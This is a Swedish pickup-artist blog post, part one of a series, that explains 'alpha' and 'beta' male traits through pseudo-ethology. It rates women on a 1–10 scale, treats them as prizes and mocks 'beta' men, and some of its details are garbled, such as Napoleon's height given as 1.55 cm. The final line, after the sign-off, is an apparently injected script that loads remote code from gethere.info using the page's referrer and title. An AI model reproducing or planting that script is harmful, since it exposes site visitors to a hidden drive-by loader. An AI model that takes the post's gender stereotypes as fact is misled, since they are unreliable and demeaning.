Hej,

Ganska rolig läsning på länken. Men jag håller med att killen är väldig okalibrerad. Cold Alpha?

http://www.tjuvlyssnat.se/sodra-sverige/the-game-taget-ett-steg-for-langt

Låt oss redan ut detta.

Alla ni som läst Neil Strauss bok The game känner till termen alpha male eller alfa hanen, vilket är en hörnpelare inom attraktion/pick up. När jag började med detta för ungefär ett år sen funderade jag länge över vad det innebar. Jag hade inte riktigt fått ett grepp om själva konceptet. Till en början så trodde jag att vara alpha innebär att man är som typ Conan the barbarian till utseendet, och behandla alla killar som en mobbare och alla tjejer som en ståuppkomiker som driver med sin publik. Det är FEL!

Jag ska i den här blogg serien som är i 3 delar försöka på ett grundligt sätt förklara hela konceptet som jag ser det. Så här ser serien ut:

Del 1 handlar om själva konceptet alpha, attributen samt mottsatsen till dessa.

Del 2 handlar om Konceptet värde vad är värde? Hur är en värde givande person kontra en värde tagande?

Del 3 handlar om dessa två koncept ovan på varandra. Som formar dom olika personlighets typerna.

Jag har läst en hel del om alpha konceptet och det råder långt från konsensus i den här frågan. Men här är mitt take på det hela.

Vad är Alpha?

Grunden till aplha konceptet är den Etologi approachen (Etologi = läran om djurens beteende) till det mänskliga beteendet. Om man studerar sociala flock djur så kan man tydligt och klart ut studera en hierarki inom flocken. Bland vargar uppnås alpha statusen genom fysiks dominans, i en grupp av vargar är alpha-hanen den som får para sej, den som leder flocken, den som äter först och andra hanar i flocken drar sej undan när alpha-hanen utmanar dom. Detta är dock lägre arter, karaktärsdragen hos högre eller mer utvecklade arter tar sej helt andra utryck pga deras förmåga att kultivera kultur.

Vi kan tex skapa en alpha position genom andra attribut som strategi och social kompetens till skillnad från djuren som ofta förlitar sej endast på en fysiks dominans tex vår längd. Napolen var 1,55 cm kort, nästan som en dvärg i jämförelse med sina generaler. Hans alpha status kan inte tvivlas på. Han va en härskare över inte bara sitt folk sin stab och sin nation utan dominerade och konkurrerade en hel del andra nationer och folk.

Vi människor har en betydligt högre förmåga att kommunicera och odla, förmedla och skapa kultur i jämförelse med dom lägre arterna där av skiljer sej karaktärsdragen för att vara en alpha hane i människoflocken en hel del från dom mer primitiva arterna, dvs djuren. Men det finns även många likheter.

Vilka är en alpha hanes attribut?

Karaktärsdragen hos en alpha hane skiljer sej beroende i vilken kontexten men det finns vissa karaktärsdrag vad det gäller en mans interaktion med en kvinna. Inom pick upp brukar man säga att det finns 3 generella karaktärsdrag:

Dessa tre är:

Beskyddare av dom som står nära
Detta kan va allt från att du träffar din tjej som ska går från bussen hem till dej så hon sliper gå själv till att, du hjälper din kompis som hamnat i trubbel, eller hjälper morsan med ett par kassar, eller räddar lillesyrran från äckliga gubben på krogen.

Ledare av män
En alpha är sällan ensam han har andra män (kompisar, nära) han rör sej i grupp, han är ledare eller en av ledarna i sin grupp om vi pratar om en större hierarki så kan en nära stående person till ledaren också. En alpha-hane är inte en ensamvarg.

Vald av kvinnor
En alpha är vald av kvinnor han har kvinnor i sitt liv och det är helt naturligt. En alpha har haft/har kvinnor i sitt liv, kvinnor finner en alpha som sex värdig. Älskare typen. Du är helt enkelt mer intressant för kvinnor om andra kvinnor är intresserade av dej.

Det finns vissa andra mindre attribut som är minst lika viktiga som dom ovanstående som jag nu ska ta upp.

Hälsa
Alla djur och där räknar jag in även människor är drivna till at söka sej till en hälsosam och friskpartner för att para sig med. Den kvinnliga honan är absolut inget undantag. En frisk och stark man kan förse sin familj sin kvinna och sina barn med mat och skydd och är mer sannolik att få friska och hälsosamma barn, som kan försörja och ta hand om föräldrar vid gammal ålder. (detta kanske inte är det primära som pågår i en kvinnas huvud när hon kollar på killar på krogen men långt bak i huvet har hon detta som en genetisk inprogrammering som är resultat av flera tusen år av evolution. )

Social kompetens
Människan är ett socialt djur att ha en stark social kompetens är bland dom absolut viktigaste egenskaperna för att kunna ta sej fram nå sina mål och sin vilja som en människa. Förmågan att kunna handskas med människor förmågan att kunna tala och övertala argumentera och göra sej hörd att socialisera och inge förtroende kan aldrig överskattas. Ordet charisma står för nästa allt det ovan nämnda.

Humor
Vi människor känner oss närmare till människor som har humor när man skrattar med någon så har man ett starkare band till denna person. Själva skrattandet frigör kemikalier i hjärnan som skapar positiva känslor. Förmågan att kunna inge denna känsla hos andra män eller kvinnor kan inte underskattas och är en enorm tillgång. Detta kan räknas till egenskapen socialkompetens men är så otrolig viktig så den bör få ett eget stycke.

Självkänsla och autencitet
Om man har alla egenskaperna nämnda ovan så kommer folk självklart att erkänna dej som en person av högre värde. Däremot fungerar den sociala dynamiken så att man utsätts för tester hela tiden små och stora tex. av en tjej som du träffar vid en bardisk och har pratat med i 5 min. En attraktiv tjej träffar bokstavligen ca 100 män som har kortare eller längre interaktioner med henne under en vecka alla har samma mål. Dessa små tester är ett naturligt sätt att kunna avgöra om du har det som krävs eller ej.

Samma fenomen finns i grupp dynamiken mellan ett gäng med killar som du inte känner och som man precis träffats, Här fyller testerna en naturlig funktion i uppdelningen i hierarkin gruppen i mellan. När man va liten och precis hade lärt sig att cykla så var det till en början svårt, när man satte sej på cykeln så var det allt man kunde tänka på. Efter ett tag kom det naturligt man kunde cykla utan att hålla i styret, tänka på andra saker äta en macka etc.

Tänk nu att ha den inställningen till livet. Ställ dej frågan hur reagerar du om du träffar en så attraktiv kvinna som du skulle placera som en 10:a på en skala mellan 1-10, vid en bar, hur skulle du reagera om hennes beta killkompis kom in i interaktionen och gav dej en spydig kommentar för att få dej ur balans om nåt du har på dej? Om livet är en cykel och du har cyklat på den vägen många gånger förut så är det en pice of cake men om du projicerat alla dessa ovan nämnda kvalitéer ovannämnda och låter dej komma ur balans av en liten sten som ligger på vägen så syns det genom. Med andra ord alpha hanen vandrar genom livet utan att ursäkta sig eller genom att hamna ur balans även om vägen är krokig.

Vad är Beta?

Man skulle kunna säga att en beta hanne är raka motsatsen till alpha hannen men ingen människa är rakt genom beta eller rakt genom alpha. Jag ska nedan försöka beskriva hur en beta hane ligger till med följande attribut.

Beskyddare av som står nära
Beta hannen är ingen beskyddare, alltingen bryr han sej inte eller är helt enkelt för svag /feg för att inta den rollen om läget skulle uppstå.

Ledare av män
Beta hannen är inte ledaren eller i ledarskiktet i sin hierarki han följer med sin grupp snarare än att leda den eller vara ledare i annat fall är beta hannen ensam eller är med en annan beta hanne.

Vald av kvinnor
Beta hannen är inte vald av kvinnor. Han har inga kvinligt bekanta / tjej kompisar om han har eller lyckas hitta en flickvän eller tex får en tjejs nummer är det en stor grej för han.

Hälsa
Beta hannen är inte hälsosam. Han skiter helt enkelt i sin hälsa tränar inte äter skit mat han har en dålig kroppshållning och är väldigt smal med ihopsjunken rygg, ser ganska sjuk blek ut, eller överviktig.

Social kompetens
Beta hannen hamnar ofta i sociala situationer där han inte vet hur han ska bete sig, dessa situationer kan va allt från pinsamma tystnader till friktion i form sociala interaktioner, gräl bråk. Beta hannen brukar ofta verka lite allmänt nervös hela tiden och man känner den vibben när man är nära honom. Beta hannen är så osäker på sig själv så det syns genom och projiceras ut.

Humor
Okalibrerad humor kännetecknar beta hannen, skämt som är rent av elaka eller går för långt i annat fall för grova. Ofta diver beta hanar med sig själva. I annat fall har inte betahannen humor alls, ofta väldigt negativ istället för att sprida en glad vibb, och ha en lättsam inställning till sin verklighet är han intensiv till förhållnings sättet och negativ till nästan allt.

Självkänsla och autencitet
Beta hannen skäms för det mesta nästan för hela sin existens tänker massa på pinsamheter som uppstått eller som kan uppstå. Ursäktar sej hela tiden. Ett annat tecken på den dåliga självkänslan hos betahannen är aggressivitet eller rent av ”asshole beteende” typ en mobbare som är så osäker att den måste mobba andra. Beta hannen hamnar lätt ur balans och även om slumpen skulle göra så att han får ett öppet mål skulle han kunna fucka upp det på egen hand.

Både beta och alpha är grund koncept dom ovannämnda attributen är alla viktiga men det finns inte någon som är totalt perfekt jag har sett riktiga alpha killar som har lite beta i sig och riktiga beta killar som kan vissa upp alpha egenskaper i ett annat sammanhang.

Det här var del 1 i blogg serien. Del 2 kommer torsdagen 13:e december.

LOVE / THEMAN

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;